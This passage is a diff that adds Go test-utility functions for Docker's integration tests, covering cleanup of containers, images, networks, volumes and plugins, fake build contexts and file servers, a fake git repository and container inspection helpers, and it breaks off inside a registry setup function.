+func readBody(b io.ReadCloser) ([]byte, error) {
+	defer b.Close()
+	return ioutil.ReadAll(b)
+}
+
+func deleteContainer(container ...string) error {
+	result := icmd.RunCommand(dockerBinary, append([]string{"rm", "-fv"}, container...)...)
+	return result.Compare(icmd.Success)
+}
+
+func getAllContainers() (string, error) {
+	getContainersCmd := exec.Command(dockerBinary, "ps", "-q", "-a")
+	out, exitCode, err := runCommandWithOutput(getContainersCmd)
+	if exitCode != 0 && err == nil {
+		err = fmt.Errorf("failed to get a list of containers: %v\n", out)
+	}
+
+	return out, err
+}
+
+func deleteAllContainers() error {
+	containers, err := getAllContainers()
+	if err != nil {
+		fmt.Println(containers)
+		return err
+	}
+	if containers == "" {
+		return nil
+	}
+
+	err = deleteContainer(strings.Split(strings.TrimSpace(containers), "\n")...)
+	if err != nil {
+		fmt.Println(err.Error())
+	}
+	return err
+}
+
+func deleteAllNetworks() error {
+	networks, err := getAllNetworks()
+	if err != nil {
+		return err
+	}
+	var errors []string
+	for _, n := range networks {
+		if n.Name == "bridge" || n.Name == "none" || n.Name == "host" {
+			continue
+		}
+		if daemonPlatform == "windows" && strings.ToLower(n.Name) == "nat" {
+			// nat is a pre-defined network on Windows and cannot be removed
+			continue
+		}
+		status, b, err := sockRequest("DELETE", "/networks/"+n.Name, nil)
+		if err != nil {
+			errors = append(errors, err.Error())
+			continue
+		}
+		if status != http.StatusNoContent {
+			errors = append(errors, fmt.Sprintf("error deleting network %s: %s", n.Name, string(b)))
+		}
+	}
+	if len(errors) > 0 {
+		return fmt.Errorf(strings.Join(errors, "\n"))
+	}
+	return nil
+}
+
+func getAllNetworks() ([]types.NetworkResource, error) {
+	var networks []types.NetworkResource
+	_, b, err := sockRequest("GET", "/networks", nil)
+	if err != nil {
+		return nil, err
+	}
+	if err := json.Unmarshal(b, &networks); err != nil {
+		return nil, err
+	}
+	return networks, nil
+}
+
+func deleteAllPlugins() error {
+	plugins, err := getAllPlugins()
+	if err != nil {
+		return err
+	}
+	var errors []string
+	for _, p := range plugins {
+		status, b, err := sockRequest("DELETE", "/plugins/"+p.Name+"?force=1", nil)
+		if err != nil {
+			errors = append(errors, err.Error())
+			continue
+		}
+		if status != http.StatusNoContent {
+			errors = append(errors, fmt.Sprintf("error deleting plugin %s: %s", p.Name, string(b)))
+		}
+	}
+	if len(errors) > 0 {
+		return fmt.Errorf(strings.Join(errors, "\n"))
+	}
+	return nil
+}
+
+func getAllPlugins() (types.PluginsListResponse, error) {
+	var plugins types.PluginsListResponse
+	_, b, err := sockRequest("GET", "/plugins", nil)
+	if err != nil {
+		return nil, err
+	}
+	if err := json.Unmarshal(b, &plugins); err != nil {
+		return nil, err
+	}
+	return plugins, nil
+}
+
+func deleteAllVolumes() error {
+	volumes, err := getAllVolumes()
+	if err != nil {
+		return err
+	}
+	var errors []string
+	for _, v := range volumes {
+		status, b, err := sockRequest("DELETE", "/volumes/"+v.Name, nil)
+		if err != nil {
+			errors = append(errors, err.Error())
+			continue
+		}
+		if status != http.StatusNoContent {
+			errors = append(errors, fmt.Sprintf("error deleting volume %s: %s", v.Name, string(b)))
+		}
+	}
+	if len(errors) > 0 {
+		return fmt.Errorf(strings.Join(errors, "\n"))
+	}
+	return nil
+}
+
+func getAllVolumes() ([]*types.Volume, error) {
+	var volumes volumetypes.VolumesListOKBody
+	_, b, err := sockRequest("GET", "/volumes", nil)
+	if err != nil {
+		return nil, err
+	}
+	if err := json.Unmarshal(b, &volumes); err != nil {
+		return nil, err
+	}
+	return volumes.Volumes, nil
+}
+
+var protectedImages = map[string]struct{}{}
+
+func deleteAllImages() error {
+	cmd := exec.Command(dockerBinary, "images")
+	cmd.Env = appendBaseEnv(true)
+	out, err := cmd.CombinedOutput()
+	if err != nil {
+		return err
+	}
+	lines := strings.Split(string(out), "\n")[1:]
+	var imgs []string
+	for _, l := range lines {
+		if l == "" {
+			continue
+		}
+		fields := strings.Fields(l)
+		imgTag := fields[0] + ":" + fields[1]
+		if _, ok := protectedImages[imgTag]; !ok {
+			if fields[0] == "<none>" {
+				imgs = append(imgs, fields[2])
+				continue
+			}
+			imgs = append(imgs, imgTag)
+		}
+	}
+	if len(imgs) == 0 {
+		return nil
+	}
+	args := append([]string{"rmi", "-f"}, imgs...)
+	if err := exec.Command(dockerBinary, args...).Run(); err != nil {
+		return err
+	}
+	return nil
+}
+
+func getPausedContainers() (string, error) {
+	getPausedContainersCmd := exec.Command(dockerBinary, "ps", "-f", "status=paused", "-q", "-a")
+	out, exitCode, err := runCommandWithOutput(getPausedContainersCmd)
+	if exitCode != 0 && err == nil {
+		err = fmt.Errorf("failed to get a list of paused containers: %v\n", out)
+	}
+
+	return out, err
+}
+
+func getSliceOfPausedContainers() ([]string, error) {
+	out, err := getPausedContainers()
+	if err == nil {
+		if len(out) == 0 {
+			return nil, err
+		}
+		slice := strings.Split(strings.TrimSpace(out), "\n")
+		return slice, err
+	}
+	return []string{out}, err
+}
+
+func unpauseContainer(container string) error {
+	return icmd.RunCommand(dockerBinary, "unpause", container).Error
+}
+
+func unpauseAllContainers() error {
+	containers, err := getPausedContainers()
+	if err != nil {
+		fmt.Println(containers)
+		return err
+	}
+
+	containers = strings.Replace(containers, "\n", " ", -1)
+	containers = strings.Trim(containers, " ")
+	containerList := strings.Split(containers, " ")
+
+	for _, value := range containerList {
+		if err = unpauseContainer(value); err != nil {
+			return err
+		}
+	}
+
+	return nil
+}
+
+func deleteImages(images ...string) error {
+	args := []string{dockerBinary, "rmi", "-f"}
+	return icmd.RunCmd(icmd.Cmd{Command: append(args, images...)}).Error
+}
+
+func imageExists(image string) error {
+	return icmd.RunCommand(dockerBinary, "inspect", image).Error
+}
+
+func pullImageIfNotExist(image string) error {
+	if err := imageExists(image); err != nil {
+		pullCmd := exec.Command(dockerBinary, "pull", image)
+		_, exitCode, err := runCommandWithOutput(pullCmd)
+
+		if err != nil || exitCode != 0 {
+			return fmt.Errorf("image %q wasn't found locally and it couldn't be pulled: %s", image, err)
+		}
+	}
+	return nil
+}
+
+func dockerCmdWithError(args ...string) (string, int, error) {
+	if err := validateArgs(args...); err != nil {
+		return "", 0, err
+	}
+	result := icmd.RunCommand(dockerBinary, args...)
+	if result.Error != nil {
+		return result.Combined(), result.ExitCode, result.Compare(icmd.Success)
+	}
+	return result.Combined(), result.ExitCode, result.Error
+}
+
+func dockerCmdWithStdoutStderr(c *check.C, args ...string) (string, string, int) {
+	if err := validateArgs(args...); err != nil {
+		c.Fatalf(err.Error())
+	}
+
+	result := icmd.RunCommand(dockerBinary, args...)
+	// TODO: why is c ever nil?
+	if c != nil {
+		c.Assert(result, icmd.Matches, icmd.Success)
+	}
+	return result.Stdout(), result.Stderr(), result.ExitCode
+}
+
+func dockerCmd(c *check.C, args ...string) (string, int) {
+	if err := validateArgs(args...); err != nil {
+		c.Fatalf(err.Error())
+	}
+	result := icmd.RunCommand(dockerBinary, args...)
+	c.Assert(result, icmd.Matches, icmd.Success)
+	return result.Combined(), result.ExitCode
+}
+
+func dockerCmdWithResult(args ...string) *icmd.Result {
+	return icmd.RunCommand(dockerBinary, args...)
+}
+
+func binaryWithArgs(args ...string) []string {
+	return append([]string{dockerBinary}, args...)
+}
+
+// execute a docker command with a timeout
+func dockerCmdWithTimeout(timeout time.Duration, args ...string) *icmd.Result {
+	if err := validateArgs(args...); err != nil {
+		return &icmd.Result{Error: err}
+	}
+	return icmd.RunCmd(icmd.Cmd{Command: binaryWithArgs(args...), Timeout: timeout})
+}
+
+// execute a docker command in a directory
+func dockerCmdInDir(c *check.C, path string, args ...string) (string, int, error) {
+	if err := validateArgs(args...); err != nil {
+		c.Fatalf(err.Error())
+	}
+	result := icmd.RunCmd(icmd.Cmd{Command: binaryWithArgs(args...), Dir: path})
+	return result.Combined(), result.ExitCode, result.Error
+}
+
+// execute a docker command in a directory with a timeout
+func dockerCmdInDirWithTimeout(timeout time.Duration, path string, args ...string) *icmd.Result {
+	if err := validateArgs(args...); err != nil {
+		return &icmd.Result{Error: err}
+	}
+	return icmd.RunCmd(icmd.Cmd{
+		Command: binaryWithArgs(args...),
+		Timeout: timeout,
+		Dir:     path,
+	})
+}
+
+// validateArgs is a checker to ensure tests are not running commands which are
+// not supported on platforms. Specifically on Windows this is 'busybox top'.
+func validateArgs(args ...string) error {
+	if daemonPlatform != "windows" {
+		return nil
+	}
+	foundBusybox := -1
+	for key, value := range args {
+		if strings.ToLower(value) == "busybox" {
+			foundBusybox = key
+		}
+		if (foundBusybox != -1) && (key == foundBusybox+1) && (strings.ToLower(value) == "top") {
+			return errors.New("cannot use 'busybox top' in tests on Windows. Use runSleepingContainer()")
+		}
+	}
+	return nil
+}
+
+// find the State.ExitCode in container metadata
+func findContainerExitCode(c *check.C, name string, vargs ...string) string {
+	args := append(vargs, "inspect", "--format='{{ .State.ExitCode }} {{ .State.Error }}'", name)
+	cmd := exec.Command(dockerBinary, args...)
+	out, _, err := runCommandWithOutput(cmd)
+	if err != nil {
+		c.Fatal(err, out)
+	}
+	return out
+}
+
+func findContainerIP(c *check.C, id string, network string) string {
+	out, _ := dockerCmd(c, "inspect", fmt.Sprintf("--format='{{ .NetworkSettings.Networks.%s.IPAddress }}'", network), id)
+	return strings.Trim(out, " \r\n'")
+}
+
+func getContainerCount() (int, error) {
+	const containers = "Containers:"
+
+	cmd := exec.Command(dockerBinary, "info")
+	out, _, err := runCommandWithOutput(cmd)
+	if err != nil {
+		return 0, err
+	}
+
+	lines := strings.Split(out, "\n")
+	for _, line := range lines {
+		if strings.Contains(line, containers) {
+			output := strings.TrimSpace(line)
+			output = strings.TrimLeft(output, containers)
+			output = strings.Trim(output, " ")
+			containerCount, err := strconv.Atoi(output)
+			if err != nil {
+				return 0, err
+			}
+			return containerCount, nil
+		}
+	}
+	return 0, fmt.Errorf("couldn't find the Container count in the output")
+}
+
+// FakeContext creates directories that can be used as a build context
+type FakeContext struct {
+	Dir string
+}
+
+// Add a file at a path, creating directories where necessary
+func (f *FakeContext) Add(file, content string) error {
+	return f.addFile(file, []byte(content))
+}
+
+func (f *FakeContext) addFile(file string, content []byte) error {
+	fp := filepath.Join(f.Dir, filepath.FromSlash(file))
+	dirpath := filepath.Dir(fp)
+	if dirpath != "." {
+		if err := os.MkdirAll(dirpath, 0755); err != nil {
+			return err
+		}
+	}
+	return ioutil.WriteFile(fp, content, 0644)
+
+}
+
+// Delete a file at a path
+func (f *FakeContext) Delete(file string) error {
+	fp := filepath.Join(f.Dir, filepath.FromSlash(file))
+	return os.RemoveAll(fp)
+}
+
+// Close deletes the context
+func (f *FakeContext) Close() error {
+	return os.RemoveAll(f.Dir)
+}
+
+func fakeContextFromNewTempDir() (*FakeContext, error) {
+	tmp, err := ioutil.TempDir("", "fake-context")
+	if err != nil {
+		return nil, err
+	}
+	if err := os.Chmod(tmp, 0755); err != nil {
+		return nil, err
+	}
+	return fakeContextFromDir(tmp), nil
+}
+
+func fakeContextFromDir(dir string) *FakeContext {
+	return &FakeContext{dir}
+}
+
+func fakeContextWithFiles(files map[string]string) (*FakeContext, error) {
+	ctx, err := fakeContextFromNewTempDir()
+	if err != nil {
+		return nil, err
+	}
+	for file, content := range files {
+		if err := ctx.Add(file, content); err != nil {
+			ctx.Close()
+			return nil, err
+		}
+	}
+	return ctx, nil
+}
+
+func fakeContextAddDockerfile(ctx *FakeContext, dockerfile string) error {
+	if err := ctx.Add("Dockerfile", dockerfile); err != nil {
+		ctx.Close()
+		return err
+	}
+	return nil
+}
+
+func fakeContext(dockerfile string, files map[string]string) (*FakeContext, error) {
+	ctx, err := fakeContextWithFiles(files)
+	if err != nil {
+		return nil, err
+	}
+	if err := fakeContextAddDockerfile(ctx, dockerfile); err != nil {
+		return nil, err
+	}
+	return ctx, nil
+}
+
+// FakeStorage is a static file server. It might be running locally or remotely
+// on test host.
+type FakeStorage interface {
+	Close() error
+	URL() string
+	CtxDir() string
+}
+
+func fakeBinaryStorage(archives map[string]*bytes.Buffer) (FakeStorage, error) {
+	ctx, err := fakeContextFromNewTempDir()
+	if err != nil {
+		return nil, err
+	}
+	for name, content := range archives {
+		if err := ctx.addFile(name, content.Bytes()); err != nil {
+			return nil, err
+		}
+	}
+	return fakeStorageWithContext(ctx)
+}
+
+// fakeStorage returns either a local or remote (at daemon machine) file server
+func fakeStorage(files map[string]string) (FakeStorage, error) {
+	ctx, err := fakeContextWithFiles(files)
+	if err != nil {
+		return nil, err
+	}
+	return fakeStorageWithContext(ctx)
+}
+
+// fakeStorageWithContext returns either a local or remote (at daemon machine) file server
+func fakeStorageWithContext(ctx *FakeContext) (FakeStorage, error) {
+	if isLocalDaemon {
+		return newLocalFakeStorage(ctx)
+	}
+	return newRemoteFileServer(ctx)
+}
+
+// localFileStorage is a file storage on the running machine
+type localFileStorage struct {
+	*FakeContext
+	*httptest.Server
+}
+
+func (s *localFileStorage) URL() string {
+	return s.Server.URL
+}
+
+func (s *localFileStorage) CtxDir() string {
+	return s.FakeContext.Dir
+}
+
+func (s *localFileStorage) Close() error {
+	defer s.Server.Close()
+	return s.FakeContext.Close()
+}
+
+func newLocalFakeStorage(ctx *FakeContext) (*localFileStorage, error) {
+	handler := http.FileServer(http.Dir(ctx.Dir))
+	server := httptest.NewServer(handler)
+	return &localFileStorage{
+		FakeContext: ctx,
+		Server:      server,
+	}, nil
+}
+
+// remoteFileServer is a containerized static file server started on the remote
+// testing machine to be used in URL-accepting docker build functionality.
+type remoteFileServer struct {
+	host      string // hostname/port web server is listening to on docker host e.g. 0.0.0.0:43712
+	container string
+	image     string
+	ctx       *FakeContext
+}
+
+func (f *remoteFileServer) URL() string {
+	u := url.URL{
+		Scheme: "http",
+		Host:   f.host}
+	return u.String()
+}
+
+func (f *remoteFileServer) CtxDir() string {
+	return f.ctx.Dir
+}
+
+func (f *remoteFileServer) Close() error {
+	defer func() {
+		if f.ctx != nil {
+			f.ctx.Close()
+		}
+		if f.image != "" {
+			deleteImages(f.image)
+		}
+	}()
+	if f.container == "" {
+		return nil
+	}
+	return deleteContainer(f.container)
+}
+
+func newRemoteFileServer(ctx *FakeContext) (*remoteFileServer, error) {
+	var (
+		image     = fmt.Sprintf("fileserver-img-%s", strings.ToLower(stringutils.GenerateRandomAlphaOnlyString(10)))
+		container = fmt.Sprintf("fileserver-cnt-%s", strings.ToLower(stringutils.GenerateRandomAlphaOnlyString(10)))
+	)
+
+	if err := ensureHTTPServerImage(); err != nil {
+		return nil, err
+	}
+
+	// Build the image
+	if err := fakeContextAddDockerfile(ctx, `FROM httpserver
+COPY . /static`); err != nil {
+		return nil, fmt.Errorf("Cannot add Dockerfile to context: %v", err)
+	}
+	if _, err := buildImageFromContext(image, ctx, false); err != nil {
+		return nil, fmt.Errorf("failed building file storage container image: %v", err)
+	}
+
+	// Start the container
+	runCmd := exec.Command(dockerBinary, "run", "-d", "-P", "--name", container, image)
+	if out, ec, err := runCommandWithOutput(runCmd); err != nil {
+		return nil, fmt.Errorf("failed to start file storage container. ec=%v\nout=%s\nerr=%v", ec, out, err)
+	}
+
+	// Find out the system assigned port
+	out, _, err := runCommandWithOutput(exec.Command(dockerBinary, "port", container, "80/tcp"))
+	if err != nil {
+		return nil, fmt.Errorf("failed to find container port: err=%v\nout=%s", err, out)
+	}
+
+	fileserverHostPort := strings.Trim(out, "\n")
+	_, port, err := net.SplitHostPort(fileserverHostPort)
+	if err != nil {
+		return nil, fmt.Errorf("unable to parse file server host:port: %v", err)
+	}
+
+	dockerHostURL, err := url.Parse(daemonHost())
+	if err != nil {
+		return nil, fmt.Errorf("unable to parse daemon host URL: %v", err)
+	}
+
+	host, _, err := net.SplitHostPort(dockerHostURL.Host)
+	if err != nil {
+		return nil, fmt.Errorf("unable to parse docker daemon host:port: %v", err)
+	}
+
+	return &remoteFileServer{
+		container: container,
+		image:     image,
+		host:      fmt.Sprintf("%s:%s", host, port),
+		ctx:       ctx}, nil
+}
+
+func inspectFieldAndMarshall(c *check.C, name, field string, output interface{}) {
+	str := inspectFieldJSON(c, name, field)
+	err := json.Unmarshal([]byte(str), output)
+	if c != nil {
+		c.Assert(err, check.IsNil, check.Commentf("failed to unmarshal: %v", err))
+	}
+}
+
+func inspectFilter(name, filter string) (string, error) {
+	format := fmt.Sprintf("{{%s}}", filter)
+	inspectCmd := exec.Command(dockerBinary, "inspect", "-f", format, name)
+	out, exitCode, err := runCommandWithOutput(inspectCmd)
+	if err != nil || exitCode != 0 {
+		return "", fmt.Errorf("failed to inspect %s: %s", name, out)
+	}
+	return strings.TrimSpace(out), nil
+}
+
+func inspectFieldWithError(name, field string) (string, error) {
+	return inspectFilter(name, fmt.Sprintf(".%s", field))
+}
+
+func inspectField(c *check.C, name, field string) string {
+	out, err := inspectFilter(name, fmt.Sprintf(".%s", field))
+	if c != nil {
+		c.Assert(err, check.IsNil)
+	}
+	return out
+}
+
+func inspectFieldJSON(c *check.C, name, field string) string {
+	out, err := inspectFilter(name, fmt.Sprintf("json .%s", field))
+	if c != nil {
+		c.Assert(err, check.IsNil)
+	}
+	return out
+}
+
+func inspectFieldMap(c *check.C, name, path, field string) string {
+	out, err := inspectFilter(name, fmt.Sprintf("index .%s %q", path, field))
+	if c != nil {
+		c.Assert(err, check.IsNil)
+	}
+	return out
+}
+
+func inspectMountSourceField(name, destination string) (string, error) {
+	m, err := inspectMountPoint(name, destination)
+	if err != nil {
+		return "", err
+	}
+	return m.Source, nil
+}
+
+func inspectMountPoint(name, destination string) (types.MountPoint, error) {
+	out, err := inspectFilter(name, "json .Mounts")
+	if err != nil {
+		return types.MountPoint{}, err
+	}
+
+	return inspectMountPointJSON(out, destination)
+}
+
+var errMountNotFound = errors.New("mount point not found")
+
+func inspectMountPointJSON(j, destination string) (types.MountPoint, error) {
+	var mp []types.MountPoint
+	if err := json.Unmarshal([]byte(j), &mp); err != nil {
+		return types.MountPoint{}, err
+	}
+
+	var m *types.MountPoint
+	for _, c := range mp {
+		if c.Destination == destination {
+			m = &c
+			break
+		}
+	}
+
+	if m == nil {
+		return types.MountPoint{}, errMountNotFound
+	}
+
+	return *m, nil
+}
+
+func inspectImage(name, filter string) (string, error) {
+	args := []string{"inspect", "--type", "image"}
+	if filter != "" {
+		format := fmt.Sprintf("{{%s}}", filter)
+		args = append(args, "-f", format)
+	}
+	args = append(args, name)
+	inspectCmd := exec.Command(dockerBinary, args...)
+	out, exitCode, err := runCommandWithOutput(inspectCmd)
+	if err != nil || exitCode != 0 {
+		return "", fmt.Errorf("failed to inspect %s: %s", name, out)
+	}
+	return strings.TrimSpace(out), nil
+}
+
+func getIDByName(name string) (string, error) {
+	return inspectFieldWithError(name, "Id")
+}
+
+// getContainerState returns the exit code of the container
+// and true if it's running
+// the exit code should be ignored if it's running
+func getContainerState(c *check.C, id string) (int, bool, error) {
+	var (
+		exitStatus int
+		running    bool
+	)
+	out, exitCode := dockerCmd(c, "inspect", "--format={{.State.Running}} {{.State.ExitCode}}", id)
+	if exitCode != 0 {
+		return 0, false, fmt.Errorf("%q doesn't exist: %s", id, out)
+	}
+
+	out = strings.Trim(out, "\n")
+	splitOutput := strings.Split(out, " ")
+	if len(splitOutput) != 2 {
+		return 0, false, fmt.Errorf("failed to get container state: output is broken")
+	}
+	if splitOutput[0] == "true" {
+		running = true
+	}
+	if n, err := strconv.Atoi(splitOutput[1]); err == nil {
+		exitStatus = n
+	} else {
+		return 0, false, fmt.Errorf("failed to get container state: couldn't parse integer")
+	}
+
+	return exitStatus, running, nil
+}
+
+func buildImageCmd(name, dockerfile string, useCache bool, buildFlags ...string) *exec.Cmd {
+	return buildImageCmdWithHost(name, dockerfile, "", useCache, buildFlags...)
+}
+
+func buildImageCmdWithHost(name, dockerfile, host string, useCache bool, buildFlags ...string) *exec.Cmd {
+	args := []string{}
+	if host != "" {
+		args = append(args, "--host", host)
+	}
+	args = append(args, "build", "-t", name)
+	if !useCache {
+		args = append(args, "--no-cache")
+	}
+	args = append(args, buildFlags...)
+	args = append(args, "-")
+	buildCmd := exec.Command(dockerBinary, args...)
+	buildCmd.Stdin = strings.NewReader(dockerfile)
+	return buildCmd
+}
+
+func buildImageWithOut(name, dockerfile string, useCache bool, buildFlags ...string) (string, string, error) {
+	buildCmd := buildImageCmd(name, dockerfile, useCache, buildFlags...)
+	out, exitCode, err := runCommandWithOutput(buildCmd)
+	if err != nil || exitCode != 0 {
+		return "", out, fmt.Errorf("failed to build the image: %s", out)
+	}
+	id, err := getIDByName(name)
+	if err != nil {
+		return "", out, err
+	}
+	return id, out, nil
+}
+
+func buildImageWithStdoutStderr(name, dockerfile string, useCache bool, buildFlags ...string) (string, string, string, error) {
+	buildCmd := buildImageCmd(name, dockerfile, useCache, buildFlags...)
+	stdout, stderr, exitCode, err := runCommandWithStdoutStderr(buildCmd)
+	if err != nil || exitCode != 0 {
+		return "", stdout, stderr, fmt.Errorf("failed to build the image: %s", stdout)
+	}
+	id, err := getIDByName(name)
+	if err != nil {
+		return "", stdout, stderr, err
+	}
+	return id, stdout, stderr, nil
+}
+
+func buildImage(name, dockerfile string, useCache bool, buildFlags ...string) (string, error) {
+	id, _, err := buildImageWithOut(name, dockerfile, useCache, buildFlags...)
+	return id, err
+}
+
+func buildImageFromContext(name string, ctx *FakeContext, useCache bool, buildFlags ...string) (string, error) {
+	id, _, err := buildImageFromContextWithOut(name, ctx, useCache, buildFlags...)
+	if err != nil {
+		return "", err
+	}
+	return id, nil
+}
+
+func buildImageFromContextWithOut(name string, ctx *FakeContext, useCache bool, buildFlags ...string) (string, string, error) {
+	args := []string{"build", "-t", name}
+	if !useCache {
+		args = append(args, "--no-cache")
+	}
+	args = append(args, buildFlags...)
+	args = append(args, ".")
+	buildCmd := exec.Command(dockerBinary, args...)
+	buildCmd.Dir = ctx.Dir
+	out, exitCode, err := runCommandWithOutput(buildCmd)
+	if err != nil || exitCode != 0 {
+		return "", "", fmt.Errorf("failed to build the image: %s", out)
+	}
+	id, err := getIDByName(name)
+	if err != nil {
+		return "", "", err
+	}
+	return id, out, nil
+}
+
+func buildImageFromContextWithStdoutStderr(name string, ctx *FakeContext, useCache bool, buildFlags ...string) (string, string, string, error) {
+	args := []string{"build", "-t", name}
+	if !useCache {
+		args = append(args, "--no-cache")
+	}
+	args = append(args, buildFlags...)
+	args = append(args, ".")
+	buildCmd := exec.Command(dockerBinary, args...)
+	buildCmd.Dir = ctx.Dir
+
+	stdout, stderr, exitCode, err := runCommandWithStdoutStderr(buildCmd)
+	if err != nil || exitCode != 0 {
+		return "", stdout, stderr, fmt.Errorf("failed to build the image: %s", stdout)
+	}
+	id, err := getIDByName(name)
+	if err != nil {
+		return "", stdout, stderr, err
+	}
+	return id, stdout, stderr, nil
+}
+
+func buildImageFromGitWithStdoutStderr(name string, ctx *fakeGit, useCache bool, buildFlags ...string) (string, string, string, error) {
+	args := []string{"build", "-t", name}
+	if !useCache {
+		args = append(args, "--no-cache")
+	}
+	args = append(args, buildFlags...)
+	args = append(args, ctx.RepoURL)
+	buildCmd := exec.Command(dockerBinary, args...)
+
+	stdout, stderr, exitCode, err := runCommandWithStdoutStderr(buildCmd)
+	if err != nil || exitCode != 0 {
+		return "", stdout, stderr, fmt.Errorf("failed to build the image: %s", stdout)
+	}
+	id, err := getIDByName(name)
+	if err != nil {
+		return "", stdout, stderr, err
+	}
+	return id, stdout, stderr, nil
+}
+
+func buildImageFromPath(name, path string, useCache bool, buildFlags ...string) (string, error) {
+	args := []string{"build", "-t", name}
+	if !useCache {
+		args = append(args, "--no-cache")
+	}
+	args = append(args, buildFlags...)
+	args = append(args, path)
+	buildCmd := exec.Command(dockerBinary, args...)
+	out, exitCode, err := runCommandWithOutput(buildCmd)
+	if err != nil || exitCode != 0 {
+		return "", fmt.Errorf("failed to build the image: %s", out)
+	}
+	return getIDByName(name)
+}
+
+type gitServer interface {
+	URL() string
+	Close() error
+}
+
+type localGitServer struct {
+	*httptest.Server
+}
+
+func (r *localGitServer) Close() error {
+	r.Server.Close()
+	return nil
+}
+
+func (r *localGitServer) URL() string {
+	return r.Server.URL
+}
+
+type fakeGit struct {
+	root    string
+	server  gitServer
+	RepoURL string
+}
+
+func (g *fakeGit) Close() {
+	g.server.Close()
+	os.RemoveAll(g.root)
+}
+
+func newFakeGit(name string, files map[string]string, enforceLocalServer bool) (*fakeGit, error) {
+	ctx, err := fakeContextWithFiles(files)
+	if err != nil {
+		return nil, err
+	}
+	defer ctx.Close()
+	curdir, err := os.Getwd()
+	if err != nil {
+		return nil, err
+	}
+	defer os.Chdir(curdir)
+
+	if output, err := exec.Command("git", "init", ctx.Dir).CombinedOutput(); err != nil {
+		return nil, fmt.Errorf("error trying to init repo: %s (%s)", err, output)
+	}
+	err = os.Chdir(ctx.Dir)
+	if err != nil {
+		return nil, err
+	}
+	if output, err := exec.Command("git", "config", "user.name", "Fake User").CombinedOutput(); err != nil {
+		return nil, fmt.Errorf("error trying to set 'user.name': %s (%s)", err, output)
+	}
+	if output, err := exec.Command("git", "config", "user.email", "fake.user@example.com").CombinedOutput(); err != nil {
+		return nil, fmt.Errorf("error trying to set 'user.email': %s (%s)", err, output)
+	}
+	if output, err := exec.Command("git", "add", "*").CombinedOutput(); err != nil {
+		return nil, fmt.Errorf("error trying to add files to repo: %s (%s)", err, output)
+	}
+	if output, err := exec.Command("git", "commit", "-a", "-m", "Initial commit").CombinedOutput(); err != nil {
+		return nil, fmt.Errorf("error trying to commit to repo: %s (%s)", err, output)
+	}
+
+	root, err := ioutil.TempDir("", "docker-test-git-repo")
+	if err != nil {
+		return nil, err
+	}
+	repoPath := filepath.Join(root, name+".git")
+	if output, err := exec.Command("git", "clone", "--bare", ctx.Dir, repoPath).CombinedOutput(); err != nil {
+		os.RemoveAll(root)
+		return nil, fmt.Errorf("error trying to clone --bare: %s (%s)", err, output)
+	}
+	err = os.Chdir(repoPath)
+	if err != nil {
+		os.RemoveAll(root)
+		return nil, err
+	}
+	if output, err := exec.Command("git", "update-server-info").CombinedOutput(); err != nil {
+		os.RemoveAll(root)
+		return nil, fmt.Errorf("error trying to git update-server-info: %s (%s)", err, output)
+	}
+	err = os.Chdir(curdir)
+	if err != nil {
+		os.RemoveAll(root)
+		return nil, err
+	}
+
+	var server gitServer
+	if !enforceLocalServer {
+		// use fakeStorage server, which might be local or remote (at test daemon)
+		server, err = fakeStorageWithContext(fakeContextFromDir(root))
+		if err != nil {
+			return nil, fmt.Errorf("cannot start fake storage: %v", err)
+		}
+	} else {
+		// always start a local http server on CLI test machine
+		httpServer := httptest.NewServer(http.FileServer(http.Dir(root)))
+		server = &localGitServer{httpServer}
+	}
+	return &fakeGit{
+		root:    root,
+		server:  server,
+		RepoURL: fmt.Sprintf("%s/%s.git", server.URL(), name),
+	}, nil
+}
+
+// Write `content` to the file at path `dst`, creating it if necessary,
+// as well as any missing directories.
+// The file is truncated if it already exists.
+// Fail the test when error occurs.
+func writeFile(dst, content string, c *check.C) {
+	// Create subdirectories if necessary
+	c.Assert(os.MkdirAll(path.Dir(dst), 0700), check.IsNil)
+	f, err := os.OpenFile(dst, os.O_CREATE|os.O_RDWR|os.O_TRUNC, 0700)
+	c.Assert(err, check.IsNil)
+	defer f.Close()
+	// Write content (truncate if it exists)
+	_, err = io.Copy(f, strings.NewReader(content))
+	c.Assert(err, check.IsNil)
+}
+
+// Return the contents of file at path `src`.
+// Fail the test when error occurs.
+func readFile(src string, c *check.C) (content string) {
+	data, err := ioutil.ReadFile(src)
+	c.Assert(err, check.IsNil)
+
+	return string(data)
+}
+
+func containerStorageFile(containerID, basename string) string {
+	return filepath.Join(containerStoragePath, containerID, basename)
+}
+
+// docker commands that use this function must be run with the '-d' switch.
+func runCommandAndReadContainerFile(filename string, cmd *exec.Cmd) ([]byte, error) {
+	out, _, err := runCommandWithOutput(cmd)
+	if err != nil {
+		return nil, fmt.Errorf("%v: %q", err, out)
+	}
+
+	contID := strings.TrimSpace(out)
+
+	if err := waitRun(contID); err != nil {
+		return nil, fmt.Errorf("%v: %q", contID, err)
+	}
+
+	return readContainerFile(contID, filename)
+}
+
+func readContainerFile(containerID, filename string) ([]byte, error) {
+	f, err := os.Open(containerStorageFile(containerID, filename))
+	if err != nil {
+		return nil, err
+	}
+	defer f.Close()
+
+	content, err := ioutil.ReadAll(f)
+	if err != nil {
+		return nil, err
+	}
+
+	return content, nil
+}
+
+func readContainerFileWithExec(containerID, filename string) ([]byte, error) {
+	out, _, err := runCommandWithOutput(exec.Command(dockerBinary, "exec", containerID, "cat", filename))
+	return []byte(out), err
+}
+
+// daemonTime provides the current time on the daemon host
+func daemonTime(c *check.C) time.Time {
+	if isLocalDaemon {
+		return time.Now()
+	}
+
+	status, body, err := sockRequest("GET", "/info", nil)
+	c.Assert(err, check.IsNil)
+	c.Assert(status, check.Equals, http.StatusOK)
+
+	type infoJSON struct {
+		SystemTime string
+	}
+	var info infoJSON
+	err = json.Unmarshal(body, &info)
+	c.Assert(err, check.IsNil, check.Commentf("unable to unmarshal GET /info response"))
+
+	dt, err := time.Parse(time.RFC3339Nano, info.SystemTime)
+	c.Assert(err, check.IsNil, check.Commentf("invalid time format in GET /info response"))
+	return dt
+}
+
+// daemonUnixTime returns the current time on the daemon host with nanoseconds precision.
+// It return the time formatted how the client sends timestamps to the server.
+func daemonUnixTime(c *check.C) string {
+	return parseEventTime(daemonTime(c))
+}
+
+func parseEventTime(t time.Time) string {
+	return fmt.Sprintf("%d.%09d", t.Unix(), int64(t.Nanosecond()))
+}
+
+func setupRegistry(c *check.C, schema1 bool, auth, tokenURL string) *testRegistryV2 {
+	reg, err := newTestRegistryV2(c, schema1, auth, tokenURL)
+	c.Assert(err, check.IsNil)
+
+	// Wait for registry to be ready to serve requests.
